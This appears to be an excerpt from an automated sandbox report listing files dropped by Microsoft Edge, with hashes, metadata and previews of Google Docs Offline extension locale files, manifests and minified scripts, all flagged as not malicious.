                                                                                                                                                      SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                      SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                      SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1205
                                                                                                                                                      Entropy (8bit):4.50367724745418
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                      MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                      SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                      SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                      SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):843
                                                                                                                                                      Entropy (8bit):5.76581227215314
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                      MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                      SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                      SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                      SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):912
                                                                                                                                                      Entropy (8bit):4.65963951143349
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                      MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                      SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                      SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                      SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):11280
                                                                                                                                                      Entropy (8bit):5.751992630887702
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                      MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                      SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                      SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                      SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):854
                                                                                                                                                      Entropy (8bit):4.284628987131403
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                      MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                      SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                      SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                      SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2525
                                                                                                                                                      Entropy (8bit):5.417833205646285
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                      MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                      SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                      SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                      SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):97
                                                                                                                                                      Entropy (8bit):4.862433271815736
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                      MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                      SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                      SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                      SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (3777)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):98880
                                                                                                                                                      Entropy (8bit):5.414989230634404
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                      MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                      SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                      SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                      SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):291
                                                                                                                                                      Entropy (8bit):4.65176400421739
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                      MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                      SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                      SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                      SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (3782)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):107677
                                                                                                                                                      Entropy (8bit):5.396220758526552
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                      MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                      SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                      SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                      SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):11185
                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1753
                                                                                                                                                      Entropy (8bit):5.8889033066924155
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                      MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                      SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                      SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                      SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):9815
                                                                                                                                                      Entropy (8bit):6.1716321262973315
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                      MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                      SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                      SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                      SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):10388
                                                                                                                                                      Entropy (8bit):6.174387413738973
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                      MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                      SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                      SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                      SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):962
                                                                                                                                                      Entropy (8bit):5.698567446030411
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                      MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                      SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                      SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                      SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                      Malicious:false
